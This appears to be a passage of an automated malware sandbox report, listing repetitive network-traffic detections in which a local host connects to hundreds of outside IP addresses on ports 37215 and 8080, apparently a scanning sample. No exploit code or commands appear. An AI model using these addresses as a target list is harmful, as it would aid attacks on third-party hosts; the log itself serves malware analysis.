                  Source: unknownNetwork traffic detected: HTTP traffic on port 38974 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57126 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59352 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44204 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42262 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54646 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60558 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42618 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42504 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56672 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42992 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47126 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48342 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57086 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57156 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47408 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39488 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56448 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 32914 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38594 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48936 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38798 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42124 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34262 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33192 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34710 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57456 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41232 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40334 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50628 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34982 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56952 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57628 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47120 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52806 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50744 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56370 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40718 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52896 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57322 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47026 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60128 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57396 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36708 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56530 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58346 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33070 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60190 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46520 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48016 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34496 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36930 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48590 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39162 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40802 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41768 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37834 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57810 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42542 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48116 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49048 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36394 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39770 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45716 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48808 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37446 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39102 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60656 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40898 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41346 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48972 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60392 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 32804 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53802 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55770 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37080 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51198 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54510 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55242 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58490 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33692 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60216 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52882 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59470 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41536 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38398 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44092 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53724 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53438 -> 37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.174.221.211:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.250.209.211:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.211.102.37:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.97.154.202:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.71.18.154:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.201.176.80:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.29.128.97:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 171.223.225.53:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.69.76.4:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 114.119.225.27:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.15.207.26:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.152.109.133:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.191.56.100:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.140.199.27:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.96.79.26:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 156.200.252.50:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.72.185.43:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 141.64.113.89:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.120.109.31:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.248.78.88:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.45.242.22:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 17.186.46.23:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.214.153.213:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.192.109.239:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.54.241.94:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.46.33.69:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.234.228.83:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.32.252.162:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.162.120.1:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.138.207.87:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.224.168.232:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.72.225.110:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 194.47.255.141:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.191.211.218:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.36.224.221:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.220.185.255:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.89.207.52:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.208.94.197:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 163.39.215.40:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.116.115.96:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.32.193.254:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.112.247.251:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.8.4.9:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.94.130.196:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.73.148.207:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.206.23.96:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.195.101.152:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 4.213.80.12:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.17.212.163:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.137.96.69:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 96.83.169.105:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 62.95.212.180:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.12.47.20:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.135.176.123:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 99.113.98.81:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 101.164.35.139:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 152.17.49.105:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.105.39.121:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.197.165.16:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 117.237.37.224:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.199.127.113:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.159.3.56:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.241.30.157:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.252.73.204:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.21.161.15:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 107.157.141.231:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.118.232.193:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.225.27.111:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.57.3.241:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 150.40.186.18:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.136.26.55:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.69.71.131:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.12.58.197:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.93.246.108:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.65.175.128:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.194.246.230:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.24.220.253:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.229.194.154:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.102.30.246:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 91.49.104.175:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.44.17.117:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.145.185.41:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.99.127.144:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.99.15.53:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 44.125.89.118:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.220.97.148:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.191.112.197:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.219.10.140:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.221.103.148:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.2.84.118:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.234.153.50:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.112.225.204:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 86.7.97.222:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.139.194.64:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.28.113.23:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.242.87.137:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.195.2.82:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.9.226.162:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.36.130.141:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 112.127.242.7:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.212.135.246:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.165.209.181:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.121.58.251:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.22.135.1:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.220.217.63:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.140.31.68:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.181.19.86:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.157.75.128:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 188.86.189.185:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 191.98.176.241:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.42.1.185:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.227.136.212:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 151.30.126.215:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.119.18.161:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.143.103.103:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 146.191.247.161:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.75.134.248:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 116.114.8.120:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.40.181.156:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.203.222.62:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.176.216.30:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.245.170.177:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 135.182.126.219:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 208.93.180.120:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 170.187.37.241:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 184.80.85.251:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.39.125.117:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 161.63.179.218:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.130.171.186:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 169.197.138.73:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.210.190.226:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.46.180.51:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.235.64.186:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 94.217.166.241:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.17.215.170:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.171.96.208:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.155.161.199:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.182.207.212:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.97.58.46:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 124.145.220.156:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.122.76.104:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.148.153.199:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 35.134.43.112:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.232.113.204:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.37.215.28:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.71.245.70:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 97.185.238.182:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.132.123.7:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 95.64.141.187:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.248.80.146:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.146.156.48:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 130.4.179.254:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.205.17.159:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.160.38.34:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.85.122.207:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.234.150.156:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.96.0.22:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.74.46.172:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 159.38.245.70:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 185.115.253.146:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.242.51.203:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.80.138.133:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.120.159.90:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 25.192.111.211:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.41.46.220:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.38.83.128:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.188.177.84:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.186.14.146:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.218.108.4:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 104.18.129.193:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.190.115.63:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.176.72.245:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.49.230.17:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.151.105.132:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.80.138.201:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 48.12.219.216:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.161.2.82:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.35.251.107:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.46.160.191:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.73.11.2:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.160.75.223:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.66.237.133:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.21.202.219:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.6.200.200:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.190.206.4:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.144.119.48:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.239.37.120:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.248.55.5:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.114.57.221:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.219.125.157:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.52.190.245:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 12.156.158.82:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.196.164.15:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.155.72.245:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.150.120.194:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.18.54.167:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 156.173.215.247:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.14.150.232:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.120.188.35:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.32.198.105:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.159.104.243:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 42.50.105.163:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 126.233.40.91:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.148.47.162:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.83.236.73:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.103.120.118:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.49.98.253:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.247.214.219:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.231.41.115:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.200.157.81:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 52.198.39.231:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 186.111.121.104:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 220.130.62.202:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 200.224.244.34:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.107.205.224:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.78.227.184:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 177.58.98.175:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.127.40.49:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 140.200.27.115:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.101.153.57:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.254.244.194:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.88.97.69:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.158.215.31:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.100.95.128:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.63.122.86:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 87.245.149.104:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.17.57.202:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.80.163.19:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.61.99.193:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 100.38.186.69:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 158.181.189.18:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.102.215.162:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.176.118.85:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.66.176.150:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.230.198.22:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.112.0.159:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.156.241.155:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.119.233.48:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 197.10.92.249:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.232.51.42:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 83.234.12.5:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.7.24.44:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.158.116.106:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.136.25.155:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.77.132.86:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.224.208.166:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 191.7.146.19:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.164.37.235:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.45.66.40:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.50.1.139:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.209.134.155:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.90.48.64:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.203.82.116:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 62.149.200.106:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 157.236.86.185:37215
                  Source: global trafficTCP traffic: 192.168.2.23:40568 -> 41.68.27.80:37215
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 176.150.221.211:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 101.139.146.203:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 66.93.103.85:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 115.222.23.211:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 91.171.202.91:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 45.6.220.235:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 31.6.205.245:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 84.92.130.99:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 132.187.48.81:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 183.209.186.148:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 145.31.99.102:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 104.128.98.153:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 20.112.118.13:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 64.29.240.157:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 1.152.96.93:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 181.229.244.181:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 152.215.100.105:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 19.152.19.7:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 94.232.206.151:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 91.143.45.113:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 60.5.249.217:8080
                  Source: global trafficTCP traffic: 192.168.2.23:39288 -> 121.192.59.40:8080
